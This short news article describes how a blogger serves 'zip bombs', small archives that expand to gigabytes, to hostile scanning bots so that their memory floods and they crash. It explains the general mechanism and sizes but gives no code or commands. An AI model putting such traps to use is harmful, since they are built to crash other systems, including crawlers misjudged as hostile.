
Software developer Ibrahim Diallo maintains a personal blog hosted on his own modest server. According to his observations, the majority of incoming traffic consists of automated bots combing the internet in search of content. Most of these bots are benign, but some attempt to breach the server—injecting malicious code or probing for vulnerabilities. In such cases, Diallo doesn’t bother with blacklists or complaints. Instead, he immediately retaliates by serving the bots a “hot” zip bomb—a compressed archive that expands a thousandfold upon extraction, often crippling the attacker’s system.
Zip bombs are deceptively small archives that conceal an enormous volume of data. One well-known example is a 46 MB file that, once unpacked, expands to a staggering 4.5 petabytes—far beyond the capacity of most computers. Technically classified as malicious software, zip bombs are designed to overwhelm and crash systems. Yet Diallo has repurposed them as a defensive weapon against hostile scanners.
He created a 1 MB archive that expands to 1 GB—sufficient to disable rudimentary bots. For more “gluttonous” crawlers with greater memory capacity, he has a 10 MB version that inflates to 10 GB. This countermeasure almost invariably causes unwanted scanners to malfunction or crash.
When Diallo’s system identifies a suspicious bot, the server responds with a standard 200 OK code and delivers the zip bomb as its payload. Relying on the file’s metadata, the bot assumes it has received a typical compressed file. Upon attempting to extract its contents, disaster strikes: the bot’s memory is flooded with the massive unpacked data, leading to a freeze or system failure.
For those curious to replicate the tactic, Diallo provides detailed instructions on his blog. However, he offers a word of caution: zip bombs must be handled with great care. Opening one on your own server by mistake can result in self-inflicted damage. Moreover, more sophisticated bots are capable of detecting such traps and will simply disregard them. Nonetheless, for the majority of simplistic automated crawlers, this method is more than enough to knock them offline—if only until their next reboot.